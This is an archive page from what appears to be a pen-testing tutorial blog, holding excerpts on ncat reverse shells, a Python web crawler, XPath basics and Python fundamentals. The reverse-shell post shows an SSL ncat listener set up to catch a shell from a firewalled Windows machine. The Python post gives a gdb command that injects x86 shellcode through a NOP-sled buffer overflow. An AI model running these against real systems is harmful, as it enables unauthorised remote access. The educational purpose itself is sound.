
Showing posts from October, 2018

Reverse Shell with Ncat

Kali Linux is the de facto distribution for pen testing. While any Linux distro (or OS) can work for backdooring into networks, it's quickest to just download a Kali Linux ISO. It comes with most of the pen testing tools (some of them cost money, but most are free) to get you up and running: https://www.kali.org/downloads/

Let's not waste time; we have a Windows machine to administer (or connect to for nefarious purposes). Let's say the Windows machine is behind a firewall with all inbound connections blocked, as shown below. This will prevent us from doing a bind shell with Windows, but not a reverse shell. To create a reverse shell, let's have our Kali Linux machine listen on an unused well-known port, 443:

    ncat -lvp 443 --ssl

The -lvp options mean listen verbosely on port 443. --ssl will encrypt all incoming traffic (note: ssl is deprecated as of ncat 7.6; to use this option, ncat 7.5 should be installed). By encrypting our traffic, it will make it difficult, albeit not im

Web Crawling with Python

The last two weeks we learned Python and XPaths. We are now going to combine the two lessons in an attempt to write a web crawler. The code below was initially written by Umer Javed; you can crawl to his link below ;)

    from lxml import html
    import requests
    import time  # needed for time.sleep() below; the import is missing from the excerpt


    class App:
        """Minimal container for a crawled page (filled in here; the excerpt is cut off before it)."""
        def __init__(self, url, links):
            self.url = url
            self.links = links


    class AppCrawler:
        def __init__(self, starting_url, depth):
            self.starting_url = starting_url
            self.depth = depth              # how many link-hops away from the start page to follow
            self.current_depth = 0
            self.depth_links = []           # one list of links per depth level
            self.apps = []                  # every page crawled so far

        def crawl(self):
            app = self.get_app_from_link(self.starting_url)
            self.apps.append(app)
            self.depth_links.append(app.links)
            while self.current_depth < self.depth:
                current_links = []
                for link in self.depth_links[self.current_depth]:
                    current_app = self.get_app_from_link(link)
                    current_links.extend(current_app.links)
                    self.apps.append(current_app)
                    time.sleep(5)           # pause between requests so we do not hammer the site
                # the excerpt stops at the sleep; these two lines advance to the next level
                self.depth_links.append(current_links)
                self.current_depth += 1

        def get_app_from_link(self, link):
            # Filled in here (not in the excerpt): fetch the page and collect its absolute links via XPath
            response = requests.get(link)
            tree = html.fromstring(response.content)
            links = tree.xpath('//a/@href[starts-with(., "http")]')
            return App(link, links)

XPath Fundamentals

Last week we looked at a light introduction to Python. This week we are going to take a look at XPaths. We need to learn XPaths if we are to build a web crawler which can be used to scrape data from websites. XPaths are fairly straightforward and easy to learn. Follow these steps:

1. Download the Chrome browser and open it.
2. The default page should be Google, so right-click on the "Google" icon.
3. Select Inspect. You should get the Developer Console to pop up as shown below.
4. Right-click on the highlighted element.
5. Select Copy >> Copy XPath.
6. Paste the path into any text editor; it should be this: //*[@id="hplogo"]

There are two types of XPaths, absolute and relative. The XPath shown above is relative. The absolute XPath of the Google logo is: /html[1]/body[1]/div[1]/div[8]/span[1]/center[1]/div[1]/img[1]

XPaths are subject to constant change, so it is always good to use a relative XPath whenever possible. Breaking down the syntax for

Python Fundamentals

Hello all, it's time to take a bit of a tangent and discuss a very readable, maintainable, C-based language with a large supporting community: Python! Why are we looking into Python? Python is used to write many tools that pen testers/hackers use on a daily basis, such as nmap. It can also be easily invoked in a shell, which has many uses. Recall the first post on buffer overflow attacks? Python can be invoked from gdb (a debugger that lets you step through a program at the assembly level) to execute shell code for a buffer overflow attack:

    (gdb) run $(python -c '"\x90" * bytes + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "return_addr" * 10')

Here, bytes is the number of bytes required to overwrite the program's return address, and return_addr is any address that returns the program into the NOP sled. Python is powerful, so it is worthwhile to learn it.